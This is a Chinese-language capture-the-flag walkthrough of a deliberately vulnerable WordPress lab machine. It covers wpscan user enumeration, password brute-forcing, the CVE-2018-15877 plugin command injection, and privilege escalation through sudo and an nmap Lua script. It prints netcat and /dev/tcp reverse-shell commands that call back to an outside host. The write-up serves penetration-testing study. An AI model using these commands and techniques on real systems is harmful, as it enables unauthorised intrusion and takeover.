涉及知识
主机扫描、wpscan
爆破密码
wordpress插件漏洞CVE-2018-15877
S权限提权
渗透过程
-
首先扫描主机得到在线主机之后进行端口扫描,得到了80和22端口在线
-
进行网站发现是wordpress使用
wpscan
进行扫描得到用户名wpscan --url http://wordy -e u [+] admin | Found By: Rss Generator (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] graham | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] mark | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] sarah | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] jens | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)
-
根据官网下载的时候给的提示将kali中的密码字典、使用wpscan进行爆破
-
使用密码登录wp后台
-
进入后台之后没有发现有文件上传或其他的漏洞可利用点,看了别人的wp之后才知道漏洞在插件上,在Activity monitor这个插件上存在一个命令注入漏洞CVE-2018-15877,该漏洞是在插件的tools功能模块中可以使用在ip地址进行命令连结的方式进行命令的执行
于是利用nc进行反弹shell,
nc -e /bin/bash 192.168.127.139 12345
得到shell之后进行查看是否有提示,结果没有任何发现,但是在mark的家目录当中发现了一个文件,里面存有graham的密码 -
使用ssh利用graham的密码进行登录到系统,
sudo -l
查看用户可以无密码执行哪些命令
sudo -l查看用户可以无密码执行哪些命令,发现可以无密码使用jens的身份运行一个脚本
更改脚本的内容使用
bash -i >& /dev/tcp/192.168.127.177/12345 0>&1
反弹jens的shell回来 -
得到jens的shell之后使用
sudo -l
查看可以无密码执行哪些命令,发现可以无密码使用root身份运行nmap,这里就可以利用nmap进行提权了,nmap的—script
可以指定一个脚本进行运行这里我们可以将命令解释的程序让nmap的脚本执行程序执行得到一个shell,就可以提权到root了但是nmap中的脚本是使用lua语言开发的所以这里需要,写一个lua的程序执行代码
os.execute('/bin/bash')
相当于system
执行命令的去执行bash生成一个shell会话,可以看到成功的提权到了root权限在root的家目录当中看到一个文件
总结
首先需要常规的端口,主机扫描目录扫描等
其次需要观察敏感看到WordPress想到相应的CMS的利用工具存在的漏洞,进行登录
根据情况搜索相应的漏洞进行利用,反弹shell
最后就是很常规的利用了特殊权限获取相应用户的shell